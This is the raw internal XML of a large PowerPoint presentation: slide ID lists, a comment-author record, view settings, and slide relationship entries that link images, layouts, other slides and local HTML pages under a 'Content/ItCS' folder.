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751" r:id="rId35"/>
    <p:sldId id="752" r:id="rId36"/>
    <p:sldId id="419" r:id="rId37"/>
    <p:sldId id="400" r:id="rId38"/>
    <p:sldId id="559" r:id="rId39"/>
    <p:sldId id="674" r:id="rId40"/>
    <p:sldId id="558" r:id="rId41"/>
    <p:sldId id="561" r:id="rId42"/>
    <p:sldId id="560" r:id="rId43"/>
    <p:sldId id="568" r:id="rId44"/>
    <p:sldId id="562" r:id="rId45"/>
    <p:sldId id="687" r:id="rId46"/>
    <p:sldId id="689" r:id="rId47"/>
    <p:sldId id="417" r:id="rId48"/>
    <p:sldId id="263" r:id="rId49"/>
    <p:sldId id="572" r:id="rId50"/>
    <p:sldId id="260" r:id="rId51"/>
    <p:sldId id="450" r:id="rId52"/>
    <p:sldId id="449" r:id="rId53"/>
    <p:sldId id="270" r:id="rId54"/>
    <p:sldId id="271" r:id="rId55"/>
    <p:sldId id="272" r:id="rId56"/>
    <p:sldId id="273" r:id="rId57"/>
    <p:sldId id="385" r:id="rId58"/>
    <p:sldId id="603" r:id="rId59"/>
    <p:sldId id="279" r:id="rId60"/>
    <p:sldId id="280" r:id="rId61"/>
    <p:sldId id="281" r:id="rId62"/>
    <p:sldId id="282" r:id="rId63"/>
    <p:sldId id="386" r:id="rId64"/>
    <p:sldId id="387" r:id="rId65"/>
    <p:sldId id="388" r:id="rId66"/>
    <p:sldId id="389" r:id="rId67"/>
    <p:sldId id="390" r:id="rId68"/>
    <p:sldId id="391" r:id="rId69"/>
    <p:sldId id="392" r:id="rId70"/>
    <p:sldId id="393" r:id="rId71"/>
    <p:sldId id="601" r:id="rId72"/>
    <p:sldId id="605" r:id="rId73"/>
    <p:sldId id="606" r:id="rId74"/>
    <p:sldId id="604" r:id="rId75"/>
    <p:sldId id="612" r:id="rId76"/>
    <p:sldId id="613" r:id="rId77"/>
    <p:sldId id="602" r:id="rId78"/>
    <p:sldId id="616" r:id="rId79"/>
    <p:sldId id="614" r:id="rId80"/>
    <p:sldId id="615" r:id="rId81"/>
    <p:sldId id="402" r:id="rId82"/>
    <p:sldId id="410" r:id="rId83"/>
    <p:sldId id="411" r:id="rId84"/>
    <p:sldId id="406" r:id="rId85"/>
    <p:sldId id="403" r:id="rId86"/>
    <p:sldId id="414" r:id="rId87"/>
    <p:sldId id="415" r:id="rId88"/>
    <p:sldId id="416" r:id="rId89"/>
    <p:sldId id="512" r:id="rId90"/>
    <p:sldId id="513" r:id="rId91"/>
    <p:sldId id="409" r:id="rId92"/>
    <p:sldId id="405" r:id="rId93"/>
    <p:sldId id="407" r:id="rId94"/>
    <p:sldId id="404" r:id="rId95"/>
    <p:sldId id="514" r:id="rId96"/>
    <p:sldId id="515" r:id="rId97"/>
    <p:sldId id="570" r:id="rId98"/>
    <p:sldId id="571" r:id="rId99"/>
    <p:sldId id="607" r:id="rId100"/>
    <p:sldId id="608" r:id="rId101"/>
    <p:sldId id="435" r:id="rId102"/>
    <p:sldId id="516" r:id="rId103"/>
    <p:sldId id="685" r:id="rId104"/>
    <p:sldId id="437" r:id="rId105"/>
    <p:sldId id="527" r:id="rId106"/>
    <p:sldId id="528" r:id="rId107"/>
    <p:sldId id="529" r:id="rId108"/>
    <p:sldId id="530" r:id="rId109"/>
    <p:sldId id="518" r:id="rId110"/>
    <p:sldId id="519" r:id="rId111"/>
    <p:sldId id="520" r:id="rId112"/>
    <p:sldId id="521" r:id="rId113"/>
    <p:sldId id="439" r:id="rId114"/>
    <p:sldId id="522" r:id="rId115"/>
    <p:sldId id="523" r:id="rId116"/>
    <p:sldId id="525" r:id="rId117"/>
    <p:sldId id="440" r:id="rId118"/>
    <p:sldId id="442" r:id="rId119"/>
    <p:sldId id="443" r:id="rId120"/>
    <p:sldId id="541" r:id="rId121"/>
    <p:sldId id="544" r:id="rId122"/>
    <p:sldId id="543" r:id="rId123"/>
    <p:sldId id="546" r:id="rId124"/>
    <p:sldId id="547" r:id="rId125"/>
    <p:sldId id="542" r:id="rId126"/>
    <p:sldId id="438" r:id="rId127"/>
    <p:sldId id="531" r:id="rId128"/>
    <p:sldId id="532" r:id="rId129"/>
    <p:sldId id="533" r:id="rId130"/>
    <p:sldId id="534" r:id="rId131"/>
    <p:sldId id="535" r:id="rId132"/>
    <p:sldId id="536" r:id="rId133"/>
    <p:sldId id="537" r:id="rId134"/>
    <p:sldId id="436" r:id="rId135"/>
    <p:sldId id="551" r:id="rId136"/>
    <p:sldId id="693" r:id="rId137"/>
    <p:sldId id="692" r:id="rId138"/>
    <p:sldId id="549" r:id="rId139"/>
    <p:sldId id="538" r:id="rId140"/>
    <p:sldId id="539" r:id="rId141"/>
    <p:sldId id="686" r:id="rId142"/>
    <p:sldId id="540" r:id="rId143"/>
    <p:sldId id="575" r:id="rId144"/>
    <p:sldId id="574" r:id="rId145"/>
    <p:sldId id="576" r:id="rId146"/>
    <p:sldId id="577" r:id="rId147"/>
    <p:sldId id="578" r:id="rId148"/>
    <p:sldId id="579" r:id="rId149"/>
    <p:sldId id="550" r:id="rId150"/>
    <p:sldId id="684" r:id="rId151"/>
    <p:sldId id="548" r:id="rId152"/>
    <p:sldId id="526" r:id="rId153"/>
    <p:sldId id="690" r:id="rId154"/>
    <p:sldId id="694" r:id="rId155"/>
    <p:sldId id="695" r:id="rId156"/>
    <p:sldId id="696" r:id="rId157"/>
    <p:sldId id="609" r:id="rId158"/>
    <p:sldId id="610" r:id="rId159"/>
    <p:sldId id="611" r:id="rId160"/>
    <p:sldId id="617" r:id="rId161"/>
    <p:sldId id="618" r:id="rId162"/>
    <p:sldId id="460" r:id="rId163"/>
    <p:sldId id="552" r:id="rId164"/>
    <p:sldId id="753" r:id="rId165"/>
    <p:sldId id="754" r:id="rId166"/>
    <p:sldId id="462" r:id="rId167"/>
    <p:sldId id="463" r:id="rId168"/>
    <p:sldId id="467" r:id="rId169"/>
    <p:sldId id="469" r:id="rId170"/>
    <p:sldId id="755" r:id="rId171"/>
    <p:sldId id="476" r:id="rId172"/>
    <p:sldId id="475" r:id="rId173"/>
    <p:sldId id="478" r:id="rId174"/>
    <p:sldId id="477" r:id="rId175"/>
    <p:sldId id="479" r:id="rId176"/>
    <p:sldId id="480" r:id="rId177"/>
    <p:sldId id="466" r:id="rId178"/>
    <p:sldId id="464" r:id="rId179"/>
    <p:sldId id="471" r:id="rId180"/>
    <p:sldId id="470" r:id="rId181"/>
    <p:sldId id="473" r:id="rId182"/>
    <p:sldId id="474" r:id="rId183"/>
    <p:sldId id="483" r:id="rId184"/>
    <p:sldId id="481" r:id="rId185"/>
    <p:sldId id="472" r:id="rId186"/>
    <p:sldId id="484" r:id="rId187"/>
    <p:sldId id="486" r:id="rId188"/>
    <p:sldId id="493" r:id="rId189"/>
    <p:sldId id="487" r:id="rId190"/>
    <p:sldId id="490" r:id="rId191"/>
    <p:sldId id="489" r:id="rId192"/>
    <p:sldId id="500" r:id="rId193"/>
    <p:sldId id="491" r:id="rId194"/>
    <p:sldId id="488" r:id="rId195"/>
    <p:sldId id="482" r:id="rId196"/>
    <p:sldId id="497" r:id="rId197"/>
    <p:sldId id="498" r:id="rId198"/>
    <p:sldId id="501" r:id="rId199"/>
    <p:sldId id="496" r:id="rId200"/>
    <p:sldId id="505" r:id="rId201"/>
    <p:sldId id="503" r:id="rId202"/>
    <p:sldId id="502" r:id="rId203"/>
    <p:sldId id="509" r:id="rId204"/>
    <p:sldId id="510" r:id="rId205"/>
    <p:sldId id="506" r:id="rId206"/>
    <p:sldId id="511" r:id="rId207"/>
    <p:sldId id="485" r:id="rId208"/>
    <p:sldId id="620" r:id="rId209"/>
    <p:sldId id="621" r:id="rId210"/>
    <p:sldId id="623" r:id="rId211"/>
    <p:sldId id="625" r:id="rId212"/>
    <p:sldId id="622" r:id="rId213"/>
    <p:sldId id="627" r:id="rId214"/>
    <p:sldId id="626" r:id="rId215"/>
    <p:sldId id="624" r:id="rId216"/>
    <p:sldId id="669" r:id="rId217"/>
    <p:sldId id="670" r:id="rId218"/>
    <p:sldId id="671" r:id="rId219"/>
    <p:sldId id="675" r:id="rId220"/>
    <p:sldId id="664" r:id="rId221"/>
    <p:sldId id="665" r:id="rId222"/>
    <p:sldId id="666" r:id="rId223"/>
    <p:sldId id="667" r:id="rId224"/>
    <p:sldId id="668" r:id="rId225"/>
    <p:sldId id="660" r:id="rId226"/>
    <p:sldId id="659" r:id="rId227"/>
    <p:sldId id="658" r:id="rId228"/>
    <p:sldId id="661" r:id="rId229"/>
    <p:sldId id="663" r:id="rId230"/>
    <p:sldId id="648" r:id="rId231"/>
    <p:sldId id="647" r:id="rId232"/>
    <p:sldId id="649" r:id="rId233"/>
    <p:sldId id="650" r:id="rId234"/>
    <p:sldId id="651" r:id="rId235"/>
    <p:sldId id="652" r:id="rId236"/>
    <p:sldId id="653" r:id="rId237"/>
    <p:sldId id="654" r:id="rId238"/>
    <p:sldId id="656" r:id="rId239"/>
    <p:sldId id="655" r:id="rId240"/>
    <p:sldId id="657" r:id="rId241"/>
    <p:sldId id="744" r:id="rId242"/>
    <p:sldId id="742" r:id="rId243"/>
    <p:sldId id="745" r:id="rId244"/>
    <p:sldId id="746" r:id="rId245"/>
    <p:sldId id="743" r:id="rId246"/>
    <p:sldId id="749" r:id="rId247"/>
    <p:sldId id="748" r:id="rId248"/>
    <p:sldId id="747" r:id="rId249"/>
    <p:sldId id="750" r:id="rId250"/>
    <p:sldId id="284" r:id="rId251"/>
    <p:sldId id="285" r:id="rId252"/>
    <p:sldId id="286" r:id="rId253"/>
    <p:sldId id="355" r:id="rId254"/>
    <p:sldId id="291" r:id="rId255"/>
    <p:sldId id="288" r:id="rId256"/>
    <p:sldId id="292" r:id="rId257"/>
    <p:sldId id="293" r:id="rId258"/>
    <p:sldId id="294" r:id="rId259"/>
    <p:sldId id="297" r:id="rId260"/>
    <p:sldId id="298" r:id="rId261"/>
    <p:sldId id="299" r:id="rId262"/>
    <p:sldId id="300" r:id="rId263"/>
    <p:sldId id="301" r:id="rId264"/>
    <p:sldId id="302" r:id="rId265"/>
    <p:sldId id="303" r:id="rId266"/>
    <p:sldId id="304" r:id="rId267"/>
    <p:sldId id="553" r:id="rId268"/>
    <p:sldId id="554" r:id="rId269"/>
    <p:sldId id="305" r:id="rId270"/>
    <p:sldId id="306" r:id="rId271"/>
    <p:sldId id="555" r:id="rId272"/>
    <p:sldId id="557" r:id="rId273"/>
    <p:sldId id="556" r:id="rId274"/>
    <p:sldId id="307" r:id="rId275"/>
    <p:sldId id="308" r:id="rId276"/>
    <p:sldId id="309" r:id="rId277"/>
    <p:sldId id="310" r:id="rId278"/>
    <p:sldId id="315" r:id="rId279"/>
    <p:sldId id="316" r:id="rId280"/>
    <p:sldId id="317" r:id="rId281"/>
    <p:sldId id="311" r:id="rId282"/>
    <p:sldId id="312" r:id="rId283"/>
    <p:sldId id="313" r:id="rId284"/>
    <p:sldId id="314" r:id="rId285"/>
    <p:sldId id="318" r:id="rId286"/>
    <p:sldId id="319" r:id="rId287"/>
    <p:sldId id="320" r:id="rId288"/>
    <p:sldId id="321" r:id="rId289"/>
    <p:sldId id="322" r:id="rId290"/>
    <p:sldId id="323" r:id="rId291"/>
    <p:sldId id="324" r:id="rId292"/>
    <p:sldId id="326" r:id="rId293"/>
    <p:sldId id="327" r:id="rId294"/>
    <p:sldId id="328" r:id="rId295"/>
    <p:sldId id="329" r:id="rId296"/>
    <p:sldId id="330" r:id="rId297"/>
    <p:sldId id="331" r:id="rId298"/>
    <p:sldId id="332" r:id="rId299"/>
    <p:sldId id="333" r:id="rId300"/>
    <p:sldId id="334" r:id="rId301"/>
    <p:sldId id="335" r:id="rId302"/>
    <p:sldId id="336" r:id="rId303"/>
    <p:sldId id="337" r:id="rId304"/>
    <p:sldId id="338" r:id="rId305"/>
    <p:sldId id="339" r:id="rId306"/>
    <p:sldId id="340" r:id="rId307"/>
    <p:sldId id="341" r:id="rId308"/>
    <p:sldId id="342" r:id="rId309"/>
    <p:sldId id="343" r:id="rId310"/>
    <p:sldId id="344" r:id="rId311"/>
    <p:sldId id="345" r:id="rId312"/>
    <p:sldId id="346" r:id="rId313"/>
    <p:sldId id="347" r:id="rId314"/>
    <p:sldId id="348" r:id="rId315"/>
    <p:sldId id="349" r:id="rId316"/>
    <p:sldId id="350" r:id="rId317"/>
    <p:sldId id="351" r:id="rId318"/>
    <p:sldId id="352" r:id="rId319"/>
    <p:sldId id="353" r:id="rId320"/>
    <p:sldId id="354" r:id="rId321"/>
    <p:sldId id="356" r:id="rId322"/>
    <p:sldId id="357" r:id="rId323"/>
    <p:sldId id="358" r:id="rId324"/>
    <p:sldId id="359" r:id="rId325"/>
    <p:sldId id="360" r:id="rId326"/>
    <p:sldId id="580" r:id="rId327"/>
    <p:sldId id="619" r:id="rId328"/>
    <p:sldId id="581" r:id="rId329"/>
    <p:sldId id="582" r:id="rId330"/>
    <p:sldId id="631" r:id="rId331"/>
    <p:sldId id="628" r:id="rId332"/>
    <p:sldId id="629" r:id="rId333"/>
    <p:sldId id="630" r:id="rId334"/>
    <p:sldId id="697" r:id="rId335"/>
    <p:sldId id="699" r:id="rId336"/>
    <p:sldId id="700" r:id="rId337"/>
    <p:sldId id="698" r:id="rId338"/>
    <p:sldId id="632" r:id="rId339"/>
    <p:sldId id="702" r:id="rId340"/>
    <p:sldId id="703" r:id="rId341"/>
    <p:sldId id="707" r:id="rId342"/>
    <p:sldId id="701" r:id="rId343"/>
    <p:sldId id="633" r:id="rId344"/>
    <p:sldId id="634" r:id="rId345"/>
    <p:sldId id="708" r:id="rId346"/>
    <p:sldId id="704" r:id="rId347"/>
    <p:sldId id="705" r:id="rId348"/>
    <p:sldId id="706" r:id="rId349"/>
    <p:sldId id="710" r:id="rId350"/>
    <p:sldId id="711" r:id="rId351"/>
    <p:sldId id="712" r:id="rId352"/>
    <p:sldId id="709" r:id="rId353"/>
    <p:sldId id="713" r:id="rId354"/>
    <p:sldId id="714" r:id="rId355"/>
    <p:sldId id="729" r:id="rId356"/>
    <p:sldId id="728" r:id="rId357"/>
    <p:sldId id="731" r:id="rId358"/>
    <p:sldId id="727" r:id="rId359"/>
    <p:sldId id="730" r:id="rId360"/>
    <p:sldId id="732" r:id="rId361"/>
    <p:sldId id="733" r:id="rId362"/>
    <p:sldId id="734" r:id="rId363"/>
    <p:sldId id="737" r:id="rId364"/>
    <p:sldId id="738" r:id="rId365"/>
    <p:sldId id="739" r:id="rId366"/>
    <p:sldId id="736" r:id="rId367"/>
    <p:sldId id="735" r:id="rId368"/>
    <p:sldId id="740" r:id="rId369"/>
    <p:sldId id="741" r:id="rId370"/>
    <p:sldId id="718" r:id="rId371"/>
    <p:sldId id="720" r:id="rId372"/>
    <p:sldId id="721" r:id="rId373"/>
    <p:sldId id="723" r:id="rId374"/>
    <p:sldId id="719" r:id="rId375"/>
    <p:sldId id="715" r:id="rId376"/>
    <p:sldId id="716" r:id="rId377"/>
    <p:sldId id="717" r:id="rId378"/>
    <p:sldId id="724" r:id="rId379"/>
    <p:sldId id="725" r:id="rId380"/>
    <p:sldId id="361" r:id="rId381"/>
    <p:sldId id="362" r:id="rId382"/>
    <p:sldId id="363" r:id="rId383"/>
    <p:sldId id="364" r:id="rId384"/>
    <p:sldId id="635" r:id="rId385"/>
    <p:sldId id="638" r:id="rId386"/>
    <p:sldId id="641" r:id="rId387"/>
    <p:sldId id="639" r:id="rId388"/>
    <p:sldId id="640" r:id="rId389"/>
    <p:sldId id="644" r:id="rId390"/>
    <p:sldId id="646" r:id="rId391"/>
    <p:sldId id="673" r:id="rId392"/>
    <p:sldId id="677" r:id="rId393"/>
    <p:sldId id="678" r:id="rId394"/>
    <p:sldId id="645" r:id="rId395"/>
    <p:sldId id="642" r:id="rId396"/>
    <p:sldId id="643" r:id="rId397"/>
    <p:sldId id="683" r:id="rId398"/>
    <p:sldId id="679" r:id="rId399"/>
    <p:sldId id="680" r:id="rId400"/>
    <p:sldId id="681" r:id="rId401"/>
    <p:sldId id="682" r:id="rId402"/>
    <p:sldId id="432" r:id="rId403"/>
    <p:sldId id="433" r:id="rId404"/>
    <p:sldId id="434" r:id="rId405"/>
    <p:sldId id="423" r:id="rId406"/>
    <p:sldId id="563" r:id="rId407"/>
    <p:sldId id="592" r:id="rId408"/>
    <p:sldId id="564" r:id="rId409"/>
    <p:sldId id="565" r:id="rId410"/>
    <p:sldId id="586" r:id="rId411"/>
    <p:sldId id="587" r:id="rId412"/>
    <p:sldId id="588" r:id="rId413"/>
    <p:sldId id="589" r:id="rId414"/>
    <p:sldId id="590" r:id="rId415"/>
    <p:sldId id="591" r:id="rId416"/>
    <p:sldId id="593" r:id="rId417"/>
    <p:sldId id="594" r:id="rId418"/>
    <p:sldId id="595" r:id="rId419"/>
    <p:sldId id="596" r:id="rId420"/>
    <p:sldId id="597" r:id="rId421"/>
    <p:sldId id="598" r:id="rId422"/>
    <p:sldId id="599" r:id="rId423"/>
    <p:sldId id="600" r:id="rId424"/>
    <p:sldId id="583" r:id="rId425"/>
    <p:sldId id="584" r:id="rId426"/>
    <p:sldId id="585" r:id="rId427"/>
    <p:sldId id="566" r:id="rId428"/>
    <p:sldId id="268" r:id="rId429"/>
    <p:sldId id="365" r:id="rId430"/>
    <p:sldId id="366" r:id="rId431"/>
    <p:sldId id="507" r:id="rId432"/>
    <p:sldId id="296" r:id="rId433"/>
    <p:sldId id="290" r:id="rId43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751"/>
            <p14:sldId id="752"/>
            <p14:sldId id="419"/>
            <p14:sldId id="400"/>
            <p14:sldId id="559"/>
            <p14:sldId id="674"/>
            <p14:sldId id="558"/>
            <p14:sldId id="561"/>
            <p14:sldId id="560"/>
            <p14:sldId id="568"/>
            <p14:sldId id="562"/>
            <p14:sldId id="687"/>
            <p14:sldId id="689"/>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693"/>
            <p14:sldId id="692"/>
            <p14:sldId id="549"/>
            <p14:sldId id="538"/>
            <p14:sldId id="539"/>
            <p14:sldId id="686"/>
            <p14:sldId id="540"/>
            <p14:sldId id="575"/>
            <p14:sldId id="574"/>
            <p14:sldId id="576"/>
            <p14:sldId id="577"/>
            <p14:sldId id="578"/>
            <p14:sldId id="579"/>
            <p14:sldId id="550"/>
            <p14:sldId id="684"/>
            <p14:sldId id="548"/>
            <p14:sldId id="526"/>
            <p14:sldId id="690"/>
            <p14:sldId id="694"/>
            <p14:sldId id="695"/>
            <p14:sldId id="696"/>
            <p14:sldId id="609"/>
            <p14:sldId id="610"/>
            <p14:sldId id="611"/>
            <p14:sldId id="617"/>
            <p14:sldId id="618"/>
            <p14:sldId id="460"/>
            <p14:sldId id="552"/>
            <p14:sldId id="753"/>
            <p14:sldId id="754"/>
            <p14:sldId id="462"/>
            <p14:sldId id="463"/>
            <p14:sldId id="467"/>
            <p14:sldId id="469"/>
            <p14:sldId id="755"/>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24"/>
            <p14:sldId id="669"/>
            <p14:sldId id="670"/>
            <p14:sldId id="671"/>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744"/>
            <p14:sldId id="742"/>
            <p14:sldId id="745"/>
            <p14:sldId id="746"/>
            <p14:sldId id="743"/>
            <p14:sldId id="749"/>
            <p14:sldId id="748"/>
            <p14:sldId id="747"/>
            <p14:sldId id="750"/>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97"/>
            <p14:sldId id="699"/>
            <p14:sldId id="700"/>
            <p14:sldId id="698"/>
            <p14:sldId id="632"/>
            <p14:sldId id="702"/>
            <p14:sldId id="703"/>
            <p14:sldId id="707"/>
            <p14:sldId id="701"/>
            <p14:sldId id="633"/>
            <p14:sldId id="634"/>
            <p14:sldId id="708"/>
            <p14:sldId id="704"/>
            <p14:sldId id="705"/>
            <p14:sldId id="706"/>
            <p14:sldId id="710"/>
            <p14:sldId id="711"/>
            <p14:sldId id="712"/>
            <p14:sldId id="709"/>
            <p14:sldId id="713"/>
            <p14:sldId id="714"/>
            <p14:sldId id="729"/>
            <p14:sldId id="728"/>
            <p14:sldId id="731"/>
            <p14:sldId id="727"/>
            <p14:sldId id="730"/>
            <p14:sldId id="732"/>
            <p14:sldId id="733"/>
            <p14:sldId id="734"/>
            <p14:sldId id="737"/>
            <p14:sldId id="738"/>
            <p14:sldId id="739"/>
            <p14:sldId id="736"/>
            <p14:sldId id="735"/>
            <p14:sldId id="740"/>
            <p14:sldId id="741"/>
            <p14:sldId id="718"/>
            <p14:sldId id="720"/>
            <p14:sldId id="721"/>
            <p14:sldId id="723"/>
            <p14:sldId id="719"/>
            <p14:sldId id="715"/>
            <p14:sldId id="716"/>
            <p14:sldId id="717"/>
            <p14:sldId id="724"/>
            <p14:sldId id="725"/>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682"/>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 id="2" name="도우" initials="도" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="b3fdc41ca2044c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135" d="100"/>
          <a:sy n="135" d="100"/>
        </p:scale>
        <p:origin x="126"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commentAuthors" Target="commentAuthors.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presProps" Target="presProps.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theme" Target="theme/theme1.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tableStyles" Target="tableStyle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2022-02-20</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2022-02-20</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2022-02-20</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2022-02-20</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2022-02-20</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2022-02-20</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2022-02-20</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2022-02-20</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2022-02-20</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2022-02-20</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2022-02-20</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2022-02-20</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428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide100.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slide" Target="slide104.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48.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide126.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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 Target="slide101.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121.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide105.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11.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.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09.jpeg"/><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0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 Target="slide300.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10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0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101.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09.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.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428.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11.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12.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101.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09.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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image" Target="../media/image129.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1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0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1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2.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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8.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide300.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121.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image" Target="../media/image129.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23.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8.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4.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8.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2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10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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide127.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image" Target="../media/image111.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-70.html" TargetMode="Externa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09.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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2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 Target="slide101.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1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8.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.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40.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide132.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slide" Target="slide101.xml"/><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44.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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5.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide134.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide153.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide136.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slide" Target="slide48.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide137.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38.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide139.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-72.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4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09.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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48.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide141.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2.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4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09.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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48.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slide" Target="slide428.xml"/><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15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09.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide152.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155.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6.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide156.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide134.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide428.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hyperlink" Target="../Content/ItCS/Block/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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slide" Target="slide428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.jpe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63.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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6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109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-61.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6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70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image169.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide168.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109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-55.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6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73.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-61.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175.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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175.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109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-61.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178.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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178.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109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-56.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9.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109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-59.html" TargetMode="Externa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82.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image181.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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85.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide182.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183.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89.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/></Relationships>
</file>

